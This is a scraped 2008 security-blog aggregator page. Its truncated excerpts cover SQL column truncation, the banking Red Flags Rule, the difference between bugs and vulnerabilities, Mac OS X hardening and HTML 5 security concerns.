Stefan Esser has a really good article about how MySQL and SQL truncate columns which can lead to security holes. He uses a good example of a column that has a width of 16 chars but he submits something with 17 chars. Obviously enforcing length is one way to enforce that, even if it almost never happens. But one other thing came to mind.
Harkening back to my days of reading Rain Forrest Puppy’s papers, I realized that often times the code does a straight regex or string matchi >>
ha.ckers
08-18-2008 5:02
Better Risk Management for Banking Industry
With the recent identify theft cases that are happening around the banking industry, a new regulation is going to be implemented for counter fight identity theft. Effective November 1, 2008, all federally regulated banks, credit card companies and other financial institutions will be required to be in full compliance with the Identity Theft Red Flags Rule, which is designed to financial services firms protect consumers' identities.. The goal of the rules is to "flag" attempted and actual identit >>
hackathology
- ha.ckers: HTML 5.0
In my last post, I mentioned that security bugs were different from other bugs. Daniel Prochnow asked:
What is the difference between bug and vulnerability?
In my point of view, in a production enviroment, every bug that may lead to a loss event (CID, image, $) must be considered a security incident.
What do you think?
I answered in the comments, but I think the answer deserves a bit more commentary, especially when Evan asked:
>>
Microsoft
- ha.ckers: HTML 5.0
- : Request Forgeries on MySpace
- : Catching up…
Good news! Matt Miller, author of plenty of cutting-edge security research, including my fave “A Brief History of Exploitation Techniques and Mitigations on Windows” has joined the Security Science team to work on improved ways to find security vulnerabilities and better software defenses through mitigations. Most recently, Matt’s been focused on design review for Windows 7.
Matt brings a massive amount of real-world exploit and defense experience to our team. Learn more ab >>
Microsoft
08-14-2008 22:20
Security is bigger than finding and fixing bugs
I just wrapped up a post over on the SDL blog with some comments about an article on Google's security work.
>>
Filed under: Security, Mac 101
Security researchers at Corsaire have published a PDF whitepaper discussing best practices for securing Mac OS X 10.5 Leopard in a networked environment. The whitepaper is free.
"While the default installation provides a relatively secure system, it may not always meet organizational security requirements. This guide is aimed at users in environments requiring stronger security controls in their operating system, making full use of the protection fe >>
tuaw
08-13-2008 22:00
Rohos Logon Key: Turn any USB device into a login key
Filed under: Software, Security
In my last post, I mentioned that security bugs were different from other bugs. Daniel Prochnow asked:
What is the difference between bug and vulnerability?
In my point of view, in a production enviroment, every bug that may lead to a loss event (CID, image, $) must be considered a security incident.
What do you think?
I answered in the comments, but I think the answer deserves a bit more commentary, especially when Evan asked:
>>
Microsoft
08-16-2008 19:58
HTML 5.0
On good authority I was told to take a good hard look at the newly proposed HTML 5.0 spec that’s floating around the WHATWG. Firstly my eyes went to the new video and audio tags which are meant to help users deal with the apparently confusing nature of the fact that we have img tags instead of just using embed for everything. Personally I think that’s just a horrible idea that’s going to break a lot of blacklists out there and potentially open more security holes depending if the scri >>
ha.ckers
- : Request Forgeries on MySpace
- : Catching up…
- : Microsecurity vs Macrosecurity